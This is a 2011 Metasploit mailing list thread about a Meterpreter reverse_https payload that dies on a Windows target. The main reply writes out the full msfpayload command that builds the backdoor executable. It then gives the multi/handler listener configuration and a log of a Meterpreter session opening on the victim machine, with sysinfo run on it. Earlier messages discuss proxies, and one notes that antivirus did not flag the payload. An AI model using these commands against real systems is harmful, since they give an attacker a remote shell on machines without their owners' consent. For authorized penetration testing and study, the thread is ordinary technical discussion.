Metasploit mailing list archives
Re: Meterpreter Reverse_HTTPS dies
From: c0lists <lists () carnal0wnage com>
Date: Thu, 3 Mar 2011 11:23:04 -0500
make sure your LPORT is right, by default reverse_https connects to 8443.

i just tested with current svn and it worked.

chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST=y.y.y.y X>demohttps.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https
Length: 369
Options: LHOST=y.y.y.y

chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

chris@carnal0wnage:~/trunk$ ./msfconsole

       =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
       =[ svn r11870 updated today (2011.03.03)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at Thu Mar 03 16:17:48 +0000 2011

meterpreter > sysinfo
Computer : COMPUTER
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language : en_US
Meterpreter: x86/win32
meterpreter >

On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
> I have tried numerous scenarios such as:
>
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a threat)
> 9. Tested without any AV protection or Firewall-IPS.
>
> When I run the payload (for example the "exe" file in an unprotected PC - no AV, no IPS) I got its name on the task manager just for a while and then it dies. However I don't see any instance of iexplorer.exe running.
>
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com> wrote:
>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>>> And then, the listener stops giving any other info. I went to the victim PC and realized that the payload exe had already died. I couldn't see it on the task manager. Concurrently, I had been running wireshark. The two last packets were:
>>>
>>> 1. Victim => Listener (RST, ACK)
>>> 2. Listener => Victim (FIN, ACK)
>>>
>>> Finally I don't get any connections. Does anyone know how to fix this?
>>
>> Is there any network proxy/filter between the target and yourself? Is the target running an endpoint protection product or HIPS? Is the target process a user-process (IE) or a system process (assuming IE/user-land)? The reverse_https payload is finicky based on the WinInet profile of the user running the code.
>>
>> -HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Feb 28)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Gerasimos Kassaras (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies ricky-lee birtles (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Jerry (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies c0lists (Mar 03)